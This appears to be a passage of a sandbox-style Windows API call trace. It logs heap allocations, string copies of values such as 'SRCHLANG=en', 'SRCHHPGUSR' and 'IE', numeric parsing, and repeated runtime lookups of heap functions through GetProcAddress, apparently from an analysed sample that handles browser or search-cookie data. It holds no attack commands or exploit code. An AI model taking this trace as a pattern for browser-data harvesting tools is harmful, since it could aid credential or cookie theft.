GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.450] lstrlenA (lpString="SRCHLANG=en") returned 11 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.450] lstrcpyA (in: lpString1=0x61f590, lpString2="SRCHLANG=en" | out: lpString1="SRCHLANG=en") returned="SRCHLANG=en" [0181.450] lstrlenA (lpString="") returned 0 [0181.450] GetProcessHeap () returned 0x5f0000 [0181.450] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f530 [0181.450] lstrcpyA (in: lpString1=0x61f530, lpString2="" | out: lpString1="") returned="" [0181.450] GetProcessHeap () returned 0x5f0000 [0181.451] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.451] lstrlenA (lpString="\r\n") returned 2 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f540 [0181.451] lstrcpyA (in: lpString1=0x61f540, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.451] lstrlenA (lpString="||") returned 2 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f580 [0181.451] lstrcpyA (in: lpString1=0x61f580, lpString2="||" | out: lpString1="||") returned="||" [0181.451] lstrlenA (lpString="|") returned 1 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.451] lstrcpyA (in: lpString1=0x61f510, lpString2="|" | out: lpString1="|") returned="|" [0181.451] lstrlenA (lpString="1024") returned 4 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f490 [0181.451] lstrcpyA (in: lpString1=0x61f490, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.451] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.451] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.451] lstrlenA (lpString="3427097728") returned 10 [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f540 [0181.451] lstrcpyA (in: lpString1=0x61f540, lpString2="3427097728" | out: lpString1="3427097728") returned="3427097728" [0181.451] GetProcessHeap () returned 0x5f0000 [0181.451] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f550 [0181.452] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.452] StrToInt64ExA (in: pszString="3427097728", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.452] lstrlenA (lpString="|") returned 1 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f620 [0181.452] lstrcpyA (in: lpString1=0x61f620, lpString2="|" | out: lpString1="|") returned="|" [0181.452] lstrlenA (lpString="1024") returned 4 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f550 [0181.452] lstrcpyA (in: lpString1=0x61f550, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f560 [0181.452] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.452] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.452] lstrlenA (lpString="3427097728") returned 10 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f560 [0181.452] lstrcpyA (in: lpString1=0x61f560, lpString2="3427097728" | out: lpString1="3427097728") returned="3427097728" [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.452] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.452] GetProcessHeap () returned 0x5f0000 [0181.452] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.453] StrToInt64ExA (in: pszString="3427097728", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.453] lstrlenA (lpString="|") returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f590 [0181.453] lstrcpyA (in: lpString1=0x61f590, lpString2="|" | out: lpString1="|") returned="|" [0181.453] lstrlenA (lpString="|") returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f660 [0181.453] lstrcpyA (in: lpString1=0x61f660, lpString2="|" | out: lpString1="|") returned="|" [0181.453] lstrlenA (lpString="|") returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5a0 [0181.453] lstrcpyA (in: lpString1=0x61f5a0, lpString2="|" | out: lpString1="|") returned="|" [0181.453] lstrlenA (lpString="|") returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.453] lstrcpyA (in: lpString1=0x61f640, lpString2="|" | out: lpString1="|") returned="|" [0181.453] lstrlenA (lpString="|") returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.453] lstrcpyA (in: lpString1=0x61f4a0, lpString2="|" | out: lpString1="|") returned="|" [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.453] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] GetProcessHeap () returned 0x5f0000 [0181.453] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.454] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.454] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5b0, Size=0x1) returned 0x61f670 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5b0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.454] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.454] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.454] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5b0, Size=0xb) returned 0x61f5d0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5b0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5c0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.454] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f480 [0181.454] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.454] GetProcessHeap () returned 0x5f0000 [0181.455] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.455] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.455] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f5c0, Size=0xb) returned 0x61f600 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f630 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.455] lstrlenA (lpString="SRCHHPGUSR") returned 10 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5c0 [0181.455] lstrcpyA (in: lpString1=0x61f5c0, lpString2="SRCHHPGUSR" | out: lpString1="SRCHHPGUSR") returned="SRCHHPGUSR" [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636080 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.455] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] GetProcessHeap () returned 0x5f0000 [0181.455] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5d0 [0181.455] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.456] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636080, Size=0x11) returned 0x6360c0 [0181.456] lstrlenA (lpString="") returned 0 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5d0 [0181.456] lstrcpyA (in: lpString1=0x61f5d0, lpString2="" | out: lpString1="") returned="" [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f480 [0181.456] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f480 [0181.456] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.456] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x1) returned 0x61f480 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636320 [0181.456] GetProcessHeap () returned 0x5f0000 [0181.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.457] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636320, Size=0x11) returned 0x636060 [0181.457] lstrlenA (lpString="IE") returned 2 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f600 [0181.457] lstrcpyA (in: lpString1=0x61f600, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636320 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f7a0 [0181.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7a0 | out: hHeap=0x5f0000) returned 1 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f740 [0181.457] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.457] GetProcessHeap () returned 0x5f0000 [0181.457] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f740 | out: hHeap=0x5f0000) returned 1 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636320, Size=0x11) returned 0x6362e0 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636180 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636180, Size=0x23) returned 0x613740 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636160 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636160, Size=0x27) returned 0x6137a0 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636260 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x29) returned 0x613a40 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636200 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636200, Size=0x49) returned 0x6205a0 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x25) returned 0x613aa0 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x4b) returned 0x620410 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x26) returned 0x6139e0 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x26) returned 0x613860 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613860, Size=0x4d) returned 0x620820 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x27) returned 0x613b00 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b00, Size=0x6d) returned 0x611f60 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x37) returned 0x635050 [0181.458] GetProcessHeap () returned 0x5f0000 [0181.458] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635050, Size=0x6f) returned 0x627350 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x38) returned 0x635410 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x635410, Size=0x83) returned 0x61cf70 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x42) returned 0x6208c0 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6208c0, Size=0x85) returned 0x61caf0 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x43) returned 0x620640 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620640, Size=0x99) returned 0x6273d0 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x6208c0 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6208c0, Size=0x9b) returned 0x627480 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x620140 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x620230 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620230, Size=0x9f) returned 0x625ca0 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620140 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627480 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6273d0 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61caf0 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cf70 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.459] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.459] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139e0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620410 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6205a0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613a40 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613740 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6362e0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636060 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6360c0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.460] GetProcessHeap () returned 0x5f0000 [0181.460] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.461] GetProcessHeap () returned 0x5f0000 [0181.461] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 